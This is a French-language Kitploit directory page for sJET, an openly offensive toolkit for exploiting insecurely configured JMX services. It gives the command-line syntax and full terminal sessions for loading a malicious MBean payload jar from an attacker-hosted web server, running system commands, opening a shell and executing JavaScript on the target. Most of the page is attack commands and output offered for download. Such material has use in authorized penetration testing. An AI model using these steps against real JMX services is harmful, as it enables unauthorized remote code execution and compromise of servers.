Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
sjet — siberas kit d'exploitation JMX | Kitploit
Outils/GitHubGitHub/siberas/sjet
Génération de PayloadsExploitationCommandement et ContrôleOutil d'Accès à Distance
GitHubsiberas/sjet

sjet

siberas kit d'exploitation JMX

Voir le dépôt
1339115il y a 5 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

sJET par siberas

siberas – Kit d'exploitation JMX

sJET permet une exploitation facile des services JMX configurés de manière non sécurisée. Des informations complémentaires sont disponibles ici et ici.

Prérequis

  • Jython 2.7

Utilisation

SJET implémente une interface en ligne de commande (utilisant argparse):

root@kitploit:~
jython sjet.py targetHost targetPort password MODE (modeOptions)

Où

  • targetHost - l'adresse IP de la cible
  • targerPort - le port cible sur lequel JMX s'exécute
  • password - le mot de passe qui a été défini lors de l'installation
  • MODE - le mode du script
  • modeOptions - les options pour le mode sélectionné

Modes et modeOptions

  • install - installe la charge utile sur la cible actuelle
    • payload_url - URL complète pour charger la charge utile
    • payload_port - port pour charger la charge utile
  • uninstall - désinstalle la charge utile de la cible actuelle
  • password - change le mot de passe sur une charge utile déjà déployée
    • password - le nouveau mot de passe
  • command - exécute la commande CMD sur la cible
    • CMD - la commande à exécuter
  • shell - démarre un shell simple sur la cible (avec les limitations de Runtime.exec() de Java)
  • javascript - exécute un fichier JavaScript FILENAME sur la cible
    • FILENAME - le JavaScript à exécuter

Exemple

Installation du MBean de la charge utile sur un service JMX vulnérable

Dans l'exemple suivant, le service JMX vulnérable s'exécute sur 192.168.11.136:9991, l'attaquant a l'adresse IP 192.168.11.132. Le service JMX se connectera au service web de l'attaquant pour télécharger le fichier jar de la charge utile. sJET démarrera le service web nécessaire sur le port 8000.

Après l'installation réussie du MBean, le mot de passe par défaut est changé en le mot de passe qui a été fourni en ligne de commande ("super_secret").

root@kitploit:~
h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret install http://192.168.11.132:8000 8000
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Starting webserver at port 8000
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
[+] Connected: rmi://192.168.11.132  1
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://192.168.11.132:8000
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
192.168.11.136 - - [22/Aug/2017 22:38:00] "GET / HTTP/1.1" 200 -
192.168.11.136 - - [22/Aug/2017 22:38:00] "GET /siberas_mlet.jar HTTP/1.1" 200 -
[+] Successfully loaded MBeanSiberas:name=payload,id=1
[+] Changing default password...
[+] Loaded de.siberas.lab.SiberasPayload
[+] Successfully changed password

h0ng10@rocksteady:~/sjet$

Exécution de la commande 'ls -la' sur une cible Linux :

Après l'installation de la charge utile, nous pouvons l'utiliser pour exécuter des commandes système sur la cible.

root@kitploit:~
h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret command "ls -la"
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
[+] Connected: rmi://192.168.11.132  2
[+] Loaded de.siberas.lab.SiberasPayload
[+] Executing command: ls -la
total 16
drwxr-xr-x  4 root    root    4096 Aug 22 16:12 .
drwxr-xr-x 66 root    root    4096 Aug 22 16:12 ..
lrwxrwxrwx  1 root    root      12 Mär 29 01:46 conf -> /etc/tomcat8
drwxr-xr-x  2 tomcat8 tomcat8 4096 Mär 29 01:46 lib
lrwxrwxrwx  1 root    root      17 Mär 29 01:46 logs -> ../../log/tomcat8
drwxrwxr-x  3 tomcat8 tomcat8 4096 Aug 22 16:12 webapps
lrwxrwxrwx  1 root    root      19 Mär 29 01:46 work -> ../../cache/tomcat8


[+] Done
h0ng10@rocksteady:~/sjet$

Exécution de ping en mode shell sur une cible

Si vous ne voulez pas charger Java pour chaque commande, vous pouvez utiliser le "mode shell" pour obtenir un shell de commandes limité.

root@kitploit:~
h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret shell
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
[+] Connected: rmi://192.168.11.132  3
[+] Use command 'exit_shell' to exit the shell
>>> ping -c 3 127.0.0.1
[+] Loaded de.siberas.lab.SiberasPayload
[+] Executing command: ping -c 3 127.0.0.1
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.075 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.046 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.044 ms

--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2050ms
rtt min/avg/max/mdev = 0.044/0.055/0.075/0.014 ms


>>> exit_shell
[+] Done
h0ng10@rocksteady:~/sjet$

Appel d'une charge utile JavaScript sur une cible :

Le script exemple 'javaproperties.js' affiche les propriétés Java du service vulnérable. Il peut être appelé comme suit :

root@kitploit:~
h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret javascript scripts/javaproperties.js
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
[+] Connected: rmi://192.168.11.132  4
[+] Loaded de.siberas.lab.SiberasPayload
[+] Executing script
java.vendor=Oracle Corporation
sun.java.launcher=SUN_STANDARD
catalina.base=/var/lib/tomcat8
sun.management.compiler=HotSpot 64-Bit Tiered Compilers
catalina.useNaming=true
os.name=Linux
...
java.vm.name=OpenJDK 64-Bit Server VM
file.encoding=UTF-8
java.specification.version=1.8


h0ng10@rocksteady:~/sjet$

Changer le mot de passe

Changez le mot de passe existant ("super_secret") en "this-is-the-new-password" :

root@kitploit:~
h0ng10@rocksteady:~/sjet$ jython sjet.py 192.168.11.136 9991 super_secret password this-is-the-new-password
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.11.136:9991/jmxrmi
[+] Connected: rmi://192.168.11.132  6
[+] Loaded de.siberas.lab.SiberasPayload
[+] Successfully changed password

[+] Done
h0ng10@rocksteady:~/sjet$

Désinstaller le MBean de la charge utile de la cible

Désinstallez la charge utile 'Siberas' de la cible :

root@kitploit:~
minmaxer@prellermbp:~/sjet$ jython sjet.py 192.168.1.101 9010 super_secret uninstall
sJET - siberas JMX Exploitation Toolkit
=======================================
[+] Connecting to: service:jmx:rmi:///jndi/rmi://192.168.1.101:9010/jmxrmi
[+] Connected: rmi://192.168.1.1  16
[+] MBean correctly uninstalled
minmaxer@prellermbp:~/sjet$

Contribuer

N'hésitez pas à contribuer.

Auteurs

  • Hans-Martin Münch - Idée initiale et travail - h0ng10
  • Patricio Reller - CLI et options supplémentaires - preller

Voir aussi la liste des contributeurs qui ont participé à ce projet.

Licence

Ce projet est sous licence MIT - voir le fichier LICENSE pour les détails.

Télécharger l’outil